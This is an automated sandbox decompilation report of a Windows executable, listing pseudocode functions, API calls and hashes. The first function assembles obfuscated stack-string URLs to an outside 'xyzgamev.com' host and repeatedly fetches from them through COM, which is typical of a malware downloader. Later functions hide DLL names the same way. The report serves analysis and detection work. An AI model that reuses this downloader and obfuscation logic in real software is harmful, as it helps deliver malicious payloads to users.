                                                                                              				intOrPtr _v604;
                                                                                              				intOrPtr _v608;
                                                                                              				intOrPtr _v612;
                                                                                              				intOrPtr _v616;
                                                                                              				intOrPtr _v620;
                                                                                              				intOrPtr _v624;
                                                                                              				intOrPtr _v628;
                                                                                              				intOrPtr _v632;
                                                                                              				intOrPtr _v636;
                                                                                              				intOrPtr _v640;
                                                                                              				intOrPtr _v644;
                                                                                              				intOrPtr _v648;
                                                                                              				intOrPtr _v652;
                                                                                              				intOrPtr _v656;
                                                                                              				char _v660;
                                                                                              				char _v664;
                                                                                              				void* __esi;
                                                                                              				void* __ebp;
                                                                                              				signed int _t40;
                                                                                              				_Unknown_base(*)()* _t46;
                                                                                              				_Unknown_base(*)()* _t49;
                                                                                              				void* _t52;
                                                                                              				void* _t54;
                                                                                              				void* _t55;
                                                                                              				void* _t67;
                                                                                              				void* _t70;
                                                                                              				signed int _t71;
                                                                                              				signed int _t73;
                                                                                              				signed int _t74;
                                                                                              				signed int _t75;
                                                                                              
                                                                                              				_t73 = (_t71 & 0xfffffff8) - 0x294;
                                                                                              				_t40 =  *0x41205c; // 0xc28b62e0
                                                                                              				_v8 = _t40 ^ _t73;
                                                                                              				_t2 =  &_v536;
                                                                                              				 *_t2 = _v536 & 0x00000000;
                                                                                              				_t75 =  *_t2;
                                                                                              				_v596 = 0x740068;
                                                                                              				_v544 = 0x740068;
                                                                                              				_v660 = 0x740068;
                                                                                              				_v576 = 0x790078;
                                                                                              				_v640 = 0x790078;
                                                                                              				_v592 = 0x700074;
                                                                                              				_v588 = 0x3a0073;
                                                                                              				_v584 = 0x2f002f;
                                                                                              				_v580 = 0x2e0076;
                                                                                              				_v572 = 0x67007a;
                                                                                              				_v564 = 0x760065;
                                                                                              				_v560 = 0x63002e;
                                                                                              				_v556 = 0x6d006f;
                                                                                              				_v552 = 0x25002f;
                                                                                              				_v548 = 0x2e0064;
                                                                                              				_v540 = 0x6c006d;
                                                                                              				_v656 = 0x700074;
                                                                                              				_v652 = 0x3a0073;
                                                                                              				_v648 = 0x2f002f;
                                                                                              				_v644 = 0x2e0076;
                                                                                              				_v636 = 0x67007a;
                                                                                              				_v628 = 0x760065;
                                                                                              				_v624 = 0x63002e;
                                                                                              				_v620 = 0x6d006f;
                                                                                              				_v616 = 0x6c002f;
                                                                                              				_v612 = 0x67006f;
                                                                                              				_v608 = 0x2e006f;
                                                                                              				_v604 = 0x6e0070;
                                                                                              				_v600 = 0x67;
                                                                                              				_v568 = 0x6d0061;
                                                                                              				_v632 = 0x6d0061;
                                                                                              				_t46 = GetProcAddress(E004011F5(), "wsprintfW");
                                                                                              				 *_t46( &_v532,  &_v596,  *0x413354, _t67);
                                                                                              				_t74 = _t73 + 0xc;
                                                                                              				_t49 = GetProcAddress(E004011B7(), "CoInitialize");
                                                                                              				 *_t49(0);
                                                                                              				do {
                                                                                              					_push(1);
                                                                                              					_push( &_v536);
                                                                                              					_t52 = E00401606(__ebx,  &_v532, 0x63002e, __edi, GetProcAddress, _t75);
                                                                                              					_t76 = _t52;
                                                                                              				} while (_t52 == 0);
                                                                                              				do {
                                                                                              					_push(2);
                                                                                              					_push( &_v664);
                                                                                              					_t54 = E00401606(__ebx,  &_v532, 0x63002e, __edi, GetProcAddress, _t76);
                                                                                              					_t77 = _t54;
                                                                                              				} while (_t54 == 0);
                                                                                              				_t55 = E00401365(__ebx, __edi, GetProcAddress, _t77);
                                                                                              				_pop(_t70);
                                                                                              				return E00401CEB(_t55, __ebx, _v12 ^ _t74, 0x63002e, __edi, _t70);
                                                                                              			}





















































                                                                                              0x00401a82
                                                                                              0x00401a88
                                                                                              0x00401a8f
                                                                                              0x00401a96
                                                                                              0x00401a96
                                                                                              0x00401a96
                                                                                              0x00401aa3
                                                                                              0x00401aa7
                                                                                              0x00401aab
                                                                                              0x00401abf
                                                                                              0x00401ac3
                                                                                              0x00401ad6
                                                                                              0x00401ade
                                                                                              0x00401ae6
                                                                                              0x00401aee
                                                                                              0x00401af6
                                                                                              0x00401afe
                                                                                              0x00401b02
                                                                                              0x00401b06
                                                                                              0x00401b0a
                                                                                              0x00401b12
                                                                                              0x00401b1a
                                                                                              0x00401b25
                                                                                              0x00401b2d
                                                                                              0x00401b35
                                                                                              0x00401b3d
                                                                                              0x00401b45
                                                                                              0x00401b4d
                                                                                              0x00401b51
                                                                                              0x00401b55
                                                                                              0x00401b59
                                                                                              0x00401b61
                                                                                              0x00401b69
                                                                                              0x00401b71
                                                                                              0x00401b79
                                                                                              0x00401b81
                                                                                              0x00401b85
                                                                                              0x00401b95
                                                                                              0x00401baa
                                                                                              0x00401bac
                                                                                              0x00401bba
                                                                                              0x00401bbe
                                                                                              0x00401bc0
                                                                                              0x00401bc7
                                                                                              0x00401bc9
                                                                                              0x00401bca
                                                                                              0x00401bcf
                                                                                              0x00401bd2
                                                                                              0x00401bd5
                                                                                              0x00401bd9
                                                                                              0x00401bdb
                                                                                              0x00401bdc
                                                                                              0x00401be1
                                                                                              0x00401be4
                                                                                              0x00401be7
                                                                                              0x00401bf3
                                                                                              0x00401bfe

                                                                                              APIs
                                                                                                • Part of subcall function 004011F5: LoadLibraryA.KERNEL32(?), ref: 00401225
                                                                                              • GetProcAddress.KERNEL32(00000000,wsprintfW), ref: 00401B95
                                                                                                • Part of subcall function 004011B7: LoadLibraryA.KERNELBASE(?), ref: 004011E3
                                                                                              • GetProcAddress.KERNEL32(00000000,CoInitialize), ref: 00401BBA
                                                                                                • Part of subcall function 00401606: __EH_prolog3_GS.LIBCMT ref: 00401610
                                                                                                • Part of subcall function 00401606: VariantInit.OLEAUT32(?), ref: 0040163C
                                                                                                • Part of subcall function 00401606: VariantClear.OLEAUT32(?), ref: 0040166B
                                                                                                • Part of subcall function 00401606: SysFreeString.OLEAUT32(?), ref: 00401677
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: AddressLibraryLoadProcVariant$ClearFreeH_prolog3_InitString
                                                                                              • String ID: /$/$/$/$CoInitialize$d$g$m$o$o$p$s$s$t$t$v$v$wsprintfW$z$z
                                                                                              • API String ID: 2502684111-2172109821
                                                                                              • Opcode ID: 0a8e03c7daa3ca2263e90664a2b493f568b7faf630ae00f1ad64417ea070644a
                                                                                              • Instruction ID: 49f2a707f9c565950d81e9577c62b46bb6719e667e2886f681ce7c4c3e40c027
                                                                                              • Opcode Fuzzy Hash: 0a8e03c7daa3ca2263e90664a2b493f568b7faf630ae00f1ad64417ea070644a
                                                                                              • Instruction Fuzzy Hash: 8B317CB0918340DFD320DF65D44975BBFE5EB84758F00492EB1989B2A1D7BA8488CF96
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 84%
                                                                                              			E00401237() {
                                                                                              				signed int _v8;
                                                                                              				char _v12;
                                                                                              				char _v13;
                                                                                              				char _v14;
                                                                                              				char _v15;
                                                                                              				char _v16;
                                                                                              				char _v17;
                                                                                              				char _v18;
                                                                                              				char _v19;
                                                                                              				char _v20;
                                                                                              				signed int _t13;
                                                                                              				void* _t18;
                                                                                              				void* _t21;
                                                                                              				void* _t22;
                                                                                              				void* _t23;
                                                                                              				signed int _t24;
                                                                                              
                                                                                              				_t13 =  *0x41205c; // 0xc28b62e0
                                                                                              				_v8 = _t13 ^ _t24;
                                                                                              				_v20 = 0x6b;
                                                                                              				_v19 = 0x65;
                                                                                              				_v18 = 0x72;
                                                                                              				_v17 = 0x6e;
                                                                                              				_v16 = 0x65;
                                                                                              				_v15 = 0x6c;
                                                                                              				_v14 = 0x33;
                                                                                              				_v13 = 0x32;
                                                                                              				_v12 = 0;
                                                                                              				return E00401CEB(LoadLibraryA( &_v20), _t18, _v8 ^ _t24, _t21, _t22, _t23);
                                                                                              			}



















                                                                                              0x0040123d
                                                                                              0x00401244
                                                                                              0x0040124b
                                                                                              0x0040124f
                                                                                              0x00401253
                                                                                              0x00401257
                                                                                              0x0040125b
                                                                                              0x0040125f
                                                                                              0x00401263
                                                                                              0x00401267
                                                                                              0x0040126b
                                                                                              0x00401280

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID: 2$3$e$e$k$l$n$r
                                                                                              • API String ID: 1029625771-2717343251
                                                                                              • Opcode ID: 72ecec633503e21ac63528e5c73977354423ffea116e07566d9e6e29265a805a
                                                                                              • Instruction ID: 0c6f31a02efe5c0cf8afa05b70c1309cb4ad29e9b848728a389c067f879edc0a
                                                                                              • Opcode Fuzzy Hash: 72ecec633503e21ac63528e5c73977354423ffea116e07566d9e6e29265a805a
                                                                                              • Instruction Fuzzy Hash: D8F0DA20D082C8EAEB02D7A8C54879EBFF55F16708F4481D9C481AB282C6BA5719C776
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 84%
                                                                                              			E004011F5() {
                                                                                              				signed int _v8;
                                                                                              				char _v10;
                                                                                              				char _v11;
                                                                                              				char _v12;
                                                                                              				char _v13;
                                                                                              				char _v14;
                                                                                              				char _v15;
                                                                                              				char _v16;
                                                                                              				signed int _t11;
                                                                                              				void* _t16;
                                                                                              				void* _t19;
                                                                                              				void* _t20;
                                                                                              				void* _t21;
                                                                                              				signed int _t22;
                                                                                              
                                                                                              				_t11 =  *0x41205c; // 0xc28b62e0
                                                                                              				_v8 = _t11 ^ _t22;
                                                                                              				_v16 = 0x55;
                                                                                              				_v15 = 0x53;
                                                                                              				_v14 = 0x45;
                                                                                              				_v13 = 0x52;
                                                                                              				_v12 = 0x33;
                                                                                              				_v11 = 0x32;
                                                                                              				_v10 = 0;
                                                                                              				return E00401CEB(LoadLibraryA( &_v16), _t16, _v8 ^ _t22, _t19, _t20, _t21);
                                                                                              			}

















                                                                                              0x004011fb
                                                                                              0x00401202
                                                                                              0x00401209
                                                                                              0x0040120d
                                                                                              0x00401211
                                                                                              0x00401215
                                                                                              0x00401219
                                                                                              0x0040121d
                                                                                              0x00401221
                                                                                              0x00401236

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: LibraryLoad
                                                                                              • String ID: 2$3$E$R$S$U
                                                                                              • API String ID: 1029625771-1411980584
                                                                                              • Opcode ID: 9511aef1269b7e0fd6c0fc619f46e583828a952d324f490ef4b0ddfaa44ae64e
                                                                                              • Instruction ID: 02f363d62c01cfbc106416fc003d29061882c3421347f6f1463c74bbed7db693
                                                                                              • Opcode Fuzzy Hash: 9511aef1269b7e0fd6c0fc619f46e583828a952d324f490ef4b0ddfaa44ae64e
                                                                                              • Instruction Fuzzy Hash: 8DF03720D0828CEEDB02D7A8C44438DFFF45F15309F44C0E9C45567282C6B95708CB65
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 89%
                                                                                              			E00406DD2(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _t15;
                                                                                              				LONG* _t21;
                                                                                              				long _t23;
                                                                                              				void* _t31;
                                                                                              				LONG* _t33;
                                                                                              				void* _t34;
                                                                                              				void* _t35;
                                                                                              
                                                                                              				_t35 = __eflags;
                                                                                              				_t29 = __edx;
                                                                                              				_t25 = __ebx;
                                                                                              				_push(0xc);
                                                                                              				_push(0x4112b8);
                                                                                              				E004030DC(__ebx, __edi, __esi);
                                                                                              				_t31 = E004059B3(__edx, __edi, _t35);
                                                                                              				_t15 =  *0x412c44; // 0xfffffffe
                                                                                              				if(( *(_t31 + 0x70) & _t15) == 0 ||  *((intOrPtr*)(_t31 + 0x6c)) == 0) {
                                                                                              					E004025AC(0xd);
                                                                                              					 *(_t34 - 4) =  *(_t34 - 4) & 0x00000000;
                                                                                              					_t33 =  *(_t31 + 0x68);
                                                                                              					 *(_t34 - 0x1c) = _t33;
                                                                                              					__eflags = _t33 -  *0x412b48; // 0x21b14d8
                                                                                              					if(__eflags != 0) {
                                                                                              						__eflags = _t33;
                                                                                              						if(_t33 != 0) {
                                                                                              							_t23 = InterlockedDecrement(_t33);
                                                                                              							__eflags = _t23;
                                                                                              							if(_t23 == 0) {
                                                                                              								__eflags = _t33 - 0x412720;
                                                                                              								if(__eflags != 0) {
                                                                                              									_push(_t33);
                                                                                              									E00401CFA(_t25, _t31, _t33, __eflags);
                                                                                              								}
                                                                                              							}
                                                                                              						}
                                                                                              						_t21 =  *0x412b48; // 0x21b14d8
                                                                                              						 *(_t31 + 0x68) = _t21;
                                                                                              						_t33 =  *0x412b48; // 0x21b14d8
                                                                                              						 *(_t34 - 0x1c) = _t33;
                                                                                              						InterlockedIncrement(_t33);
                                                                                              					}
                                                                                              					 *(_t34 - 4) = 0xfffffffe;
                                                                                              					E00406E6D();
                                                                                              				} else {
                                                                                              					_t33 =  *(_t31 + 0x68);
                                                                                              				}
                                                                                              				if(_t33 == 0) {
                                                                                              					E00404993(_t25, _t29, _t31, 0x20);
                                                                                              				}
                                                                                              				return E00403121(_t33);
                                                                                              			}










                                                                                              0x00406dd2
                                                                                              0x00406dd2
                                                                                              0x00406dd2
                                                                                              0x00406dd2
                                                                                              0x00406dd4
                                                                                              0x00406dd9
                                                                                              0x00406de3
                                                                                              0x00406de5
                                                                                              0x00406ded
                                                                                              0x00406e0e
                                                                                              0x00406e14
                                                                                              0x00406e18
                                                                                              0x00406e1b
                                                                                              0x00406e1e
                                                                                              0x00406e24
                                                                                              0x00406e26
                                                                                              0x00406e28
                                                                                              0x00406e2b
                                                                                              0x00406e31
                                                                                              0x00406e33
                                                                                              0x00406e35
                                                                                              0x00406e3b
                                                                                              0x00406e3d
                                                                                              0x00406e3e
                                                                                              0x00406e43
                                                                                              0x00406e3b
                                                                                              0x00406e33
                                                                                              0x00406e44
                                                                                              0x00406e49
                                                                                              0x00406e4c
                                                                                              0x00406e52
                                                                                              0x00406e56
                                                                                              0x00406e56
                                                                                              0x00406e5c
                                                                                              0x00406e63
                                                                                              0x00406df5
                                                                                              0x00406df5
                                                                                              0x00406df5
                                                                                              0x00406dfa
                                                                                              0x00406dfe
                                                                                              0x00406e03
                                                                                              0x00406e0b

                                                                                              APIs
                                                                                                • Part of subcall function 004059B3: __getptd_noexit.LIBCMT ref: 004059B4
                                                                                                • Part of subcall function 004059B3: __amsg_exit.LIBCMT ref: 004059C1
                                                                                              • __amsg_exit.LIBCMT ref: 00406DFE
                                                                                              • __lock.LIBCMT ref: 00406E0E
                                                                                              • InterlockedDecrement.KERNEL32(?), ref: 00406E2B
                                                                                              • InterlockedIncrement.KERNEL32(021B14D8), ref: 00406E56
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd_noexit__lock
                                                                                              • String ID: 'A
                                                                                              • API String ID: 2880340415-470965393
                                                                                              • Opcode ID: 027332277b63235eeee193644f634dde1b53266a91b5becab0d541f5b965dd28
                                                                                              • Instruction ID: b2da427335a1ae73ce3a8a3ead560aca65ba4e4245f71007b2ea106d92f13243
                                                                                              • Opcode Fuzzy Hash: 027332277b63235eeee193644f634dde1b53266a91b5becab0d541f5b965dd28
                                                                                              • Instruction Fuzzy Hash: 28017C35A01B10EBD721AF65C90579AB7A0AB04B24F11413BE906B76D1C77CADA0CBDD
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 39%
                                                                                              			E00401CFA(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				intOrPtr* _t10;
                                                                                              				intOrPtr _t13;
                                                                                              				intOrPtr _t23;
                                                                                              				void* _t25;
                                                                                              
                                                                                              				_push(0xc);
                                                                                              				_push(0x411058);
                                                                                              				_t8 = E004030DC(__ebx, __edi, __esi);
                                                                                              				_t23 =  *((intOrPtr*)(_t25 + 8));
                                                                                              				if(_t23 == 0) {
                                                                                              					L9:
                                                                                              					return E00403121(_t8);
                                                                                              				}
                                                                                              				if( *0x4154dc != 3) {
                                                                                              					_push(_t23);
                                                                                              					L7:
                                                                                              					_t8 = HeapFree( *0x4136c4, 0, ??);
                                                                                              					_t31 = _t8;
                                                                                              					if(_t8 == 0) {
                                                                                              						_t10 = E0040233D(_t31);
                                                                                              						 *_t10 = E00402302(GetLastError());
                                                                                              					}
                                                                                              					goto L9;
                                                                                              				}
                                                                                              				E004025AC(4);
                                                                                              				 *(_t25 - 4) =  *(_t25 - 4) & 0x00000000;
                                                                                              				_t13 = E00402625(_t23);
                                                                                              				 *((intOrPtr*)(_t25 - 0x1c)) = _t13;
                                                                                              				if(_t13 != 0) {
                                                                                              					_push(_t23);
                                                                                              					_push(_t13);
                                                                                              					E00402650();
                                                                                              				}
                                                                                              				 *(_t25 - 4) = 0xfffffffe;
                                                                                              				_t8 = E00401D50();
                                                                                              				if( *((intOrPtr*)(_t25 - 0x1c)) != 0) {
                                                                                              					goto L9;
                                                                                              				} else {
                                                                                              					_push( *((intOrPtr*)(_t25 + 8)));
                                                                                              					goto L7;
                                                                                              				}
                                                                                              			}







                                                                                              0x00401cfa
                                                                                              0x00401cfc
                                                                                              0x00401d01
                                                                                              0x00401d06
                                                                                              0x00401d0b
                                                                                              0x00401d82
                                                                                              0x00401d87
                                                                                              0x00401d87
                                                                                              0x00401d14
                                                                                              0x00401d59
                                                                                              0x00401d5a
                                                                                              0x00401d62
                                                                                              0x00401d68
                                                                                              0x00401d6a
                                                                                              0x00401d6c
                                                                                              0x00401d7f
                                                                                              0x00401d81
                                                                                              0x00000000
                                                                                              0x00401d6a
                                                                                              0x00401d18
                                                                                              0x00401d1e
                                                                                              0x00401d23
                                                                                              0x00401d29
                                                                                              0x00401d2e
                                                                                              0x00401d30
                                                                                              0x00401d31
                                                                                              0x00401d32
                                                                                              0x00401d38
                                                                                              0x00401d39
                                                                                              0x00401d40
                                                                                              0x00401d49
                                                                                              0x00000000
                                                                                              0x00401d4b
                                                                                              0x00401d4b
                                                                                              0x00000000
                                                                                              0x00401d4b

                                                                                              APIs
                                                                                              • __lock.LIBCMT ref: 00401D18
                                                                                                • Part of subcall function 004025AC: __mtinitlocknum.LIBCMT ref: 004025C0
                                                                                                • Part of subcall function 004025AC: __amsg_exit.LIBCMT ref: 004025CC
                                                                                                • Part of subcall function 004025AC: EnterCriticalSection.KERNEL32(00000205,00000205,?,00407FF2,00000004,00411378,0000000C,00405E3E,00000000,00000000,00000000,00000000,00000000,00405965,00000001,00000214), ref: 004025D4
                                                                                              • ___sbh_find_block.LIBCMT ref: 00401D23
                                                                                              • ___sbh_free_block.LIBCMT ref: 00401D32
                                                                                              • HeapFree.KERNEL32(00000000,00405965,00411058,0000000C,0040258D,00000000,00411108,0000000C,004025C5,00405965,00000205,?,00407FF2,00000004,00411378,0000000C), ref: 00401D62
                                                                                              • GetLastError.KERNEL32(?,00407FF2,00000004,00411378,0000000C,00405E3E,00000000,00000000,00000000,00000000,00000000,00405965,00000001,00000214,?,?), ref: 00401D73
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: CriticalEnterErrorFreeHeapLastSection___sbh_find_block___sbh_free_block__amsg_exit__lock__mtinitlocknum
                                                                                              • String ID:
                                                                                              • API String ID: 2714421763-0
                                                                                              • Opcode ID: bcf83a2ed211a9fc8a3e229c54ffe49751a057b629f16572afcfddd1f24a1845
                                                                                              • Instruction ID: 7b173d1d0198dcbf6b6d1728b6b0f8f8295b96b0af24a84ab7914d8859557256
                                                                                              • Opcode Fuzzy Hash: bcf83a2ed211a9fc8a3e229c54ffe49751a057b629f16572afcfddd1f24a1845
                                                                                              • Instruction Fuzzy Hash: FB01A271901205BADB30BFB29D0A75E3B68AF10329F10413FF905761E1CA7CAA40CA5C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 100%
                                                                                              			E00403C9E() {
                                                                                              				intOrPtr _t5;
                                                                                              				intOrPtr _t6;
                                                                                              				intOrPtr _t10;
                                                                                              				void* _t12;
                                                                                              				intOrPtr _t15;
                                                                                              				intOrPtr* _t16;
                                                                                              				signed int _t19;
                                                                                              				signed int _t20;
                                                                                              				intOrPtr _t26;
                                                                                              				intOrPtr _t27;
                                                                                              
                                                                                              				_t5 =  *0x4154c0;
                                                                                              				_t26 = 0x14;
                                                                                              				if(_t5 != 0) {
                                                                                              					if(_t5 < _t26) {
                                                                                              						_t5 = _t26;
                                                                                              						goto L4;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_t5 = 0x200;
                                                                                              					L4:
                                                                                              					 *0x4154c0 = _t5;
                                                                                              				}
                                                                                              				_t6 = E00405E2B(_t5, 4);
                                                                                              				 *0x4144b4 = _t6;
                                                                                              				if(_t6 != 0) {
                                                                                              					L8:
                                                                                              					_t19 = 0;
                                                                                              					_t15 = 0x412320;
                                                                                              					while(1) {
                                                                                              						 *((intOrPtr*)(_t19 + _t6)) = _t15;
                                                                                              						_t15 = _t15 + 0x20;
                                                                                              						_t19 = _t19 + 4;
                                                                                              						if(_t15 >= 0x4125a0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						_t6 =  *0x4144b4;
                                                                                              					}
                                                                                              					_t27 = 0xfffffffe;
                                                                                              					_t20 = 0;
                                                                                              					_t16 = 0x412330;
                                                                                              					do {
                                                                                              						_t10 =  *((intOrPtr*)((_t20 & 0x0000001f) * 0x28 +  *((intOrPtr*)(0x4143a0 + (_t20 >> 5) * 4))));
                                                                                              						if(_t10 == 0xffffffff || _t10 == _t27 || _t10 == 0) {
                                                                                              							 *_t16 = _t27;
                                                                                              						}
                                                                                              						_t16 = _t16 + 0x20;
                                                                                              						_t20 = _t20 + 1;
                                                                                              					} while (_t16 < 0x412390);
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					 *0x4154c0 = _t26;
                                                                                              					_t6 = E00405E2B(_t26, 4);
                                                                                              					 *0x4144b4 = _t6;
                                                                                              					if(_t6 != 0) {
                                                                                              						goto L8;
                                                                                              					} else {
                                                                                              						_t12 = 0x1a;
                                                                                              						return _t12;
                                                                                              					}
                                                                                              				}
                                                                                              			}













                                                                                              0x00403c9e
                                                                                              0x00403ca8
                                                                                              0x00403ca9
                                                                                              0x00403cb4
                                                                                              0x00403cb6
                                                                                              0x00000000
                                                                                              0x00403cb6
                                                                                              0x00403cab
                                                                                              0x00403cab
                                                                                              0x00403cb8
                                                                                              0x00403cb8
                                                                                              0x00403cb8
                                                                                              0x00403cc0
                                                                                              0x00403cc9
                                                                                              0x00403cce
                                                                                              0x00403cee
                                                                                              0x00403cee
                                                                                              0x00403cf0
                                                                                              0x00403cfc
                                                                                              0x00403cfc
                                                                                              0x00403cff
                                                                                              0x00403d02
                                                                                              0x00403d0b
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00403cf7
                                                                                              0x00403cf7
                                                                                              0x00403d0f
                                                                                              0x00403d10
                                                                                              0x00403d12
                                                                                              0x00403d18
                                                                                              0x00403d2c
                                                                                              0x00403d32
                                                                                              0x00403d3c
                                                                                              0x00403d3c
                                                                                              0x00403d3e
                                                                                              0x00403d41
                                                                                              0x00403d42
                                                                                              0x00403d4e
                                                                                              0x00403cd0
                                                                                              0x00403cd3
                                                                                              0x00403cd9
                                                                                              0x00403ce2
                                                                                              0x00403ce7
                                                                                              0x00000000
                                                                                              0x00403ce9
                                                                                              0x00403ceb
                                                                                              0x00403ced
                                                                                              0x00403ced
                                                                                              0x00403ce7

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.271302047.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.271298236.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271318755.000000000040F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271325959.0000000000412000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.271331254.0000000000416000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                              Similarity
                                                                                              • API ID: __calloc_crt
                                                                                              • String ID: #A$0#A
                                                                                              • API String ID: 3494438863-36911901
                                                                                              • Opcode ID: dbcc648f1d2a12e3e839a65b3078a498f0e1a124beb1a423895e889c4ddb48a3
                                                                                              • Instruction ID: c20372475ddcd130d40e6cdb9dc3e086da4ac6ec13a688596a2233ee19e8ea84
                                                                                              • Opcode Fuzzy Hash: dbcc648f1d2a12e3e839a65b3078a498f0e1a124beb1a423895e889c4ddb48a3
                                                                                              • Instruction Fuzzy Hash: 4A11BF322196105AF7288F2EBD413E62B9EEB85325B24813BE915FB2E0D63CC981024C
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 82%
                                                                                              			E004074A5(intOrPtr* __eax, intOrPtr __edi) {
                                                                                              				intOrPtr _t10;
                                                                                              				intOrPtr* _t12;
                                                                                              
                                                                                              				_t10 = __edi;
                                                                                              				if(__edi == 0 || __eax == 0) {
                                                                                              					return 0;
                                                                                              				} else {
                                                                                              					_t12 =  *__eax;
                                                                                              					if(_t12 != __edi) {
                                                                                              						_push(__edi);
                                                                                              						 *__eax = __edi;
                                                                                              						E00407393();
                                                                                              						if(_t12 != 0) {
                                                                                              							_push(_t12);
                                                                                              							E00407419();
                                                                                              							if( *_t12 == 0 && _t12 != 0x412c50) {
                                                                                              								E00407253(_t12);
                                                                                              							}
                                                                                              						}
                                                                                              					}
                                                                                              					return _t10;
                                                                                              				}
                                                                                              			}





                                                                                              0x004074a5
                                                                                              0x004074a7
                                                                                              0x004074e2
                                                                                              0x004074ad
                                                                                              0x004074ae
                                                                                              0x004074b2
                                                                                              0x004074b4
                                                                                              0x004074b5
                                                                                              0x004074b7
                                                                                              0x004074bf
                                                                                              0x004074c1
                                                                                              0x004074c2
                                                                                              0x004074cb
                                                                                              0x004074d6
                                                                                              0x004074db
                                                                                              0x004074cb
                                                                                              0x004074bf
                                                                                              0x004074df
                                                                                              0x004074df

                                                                                              APIs
                                                                                              • ___addlocaleref.LIBCMT ref: 004074B7
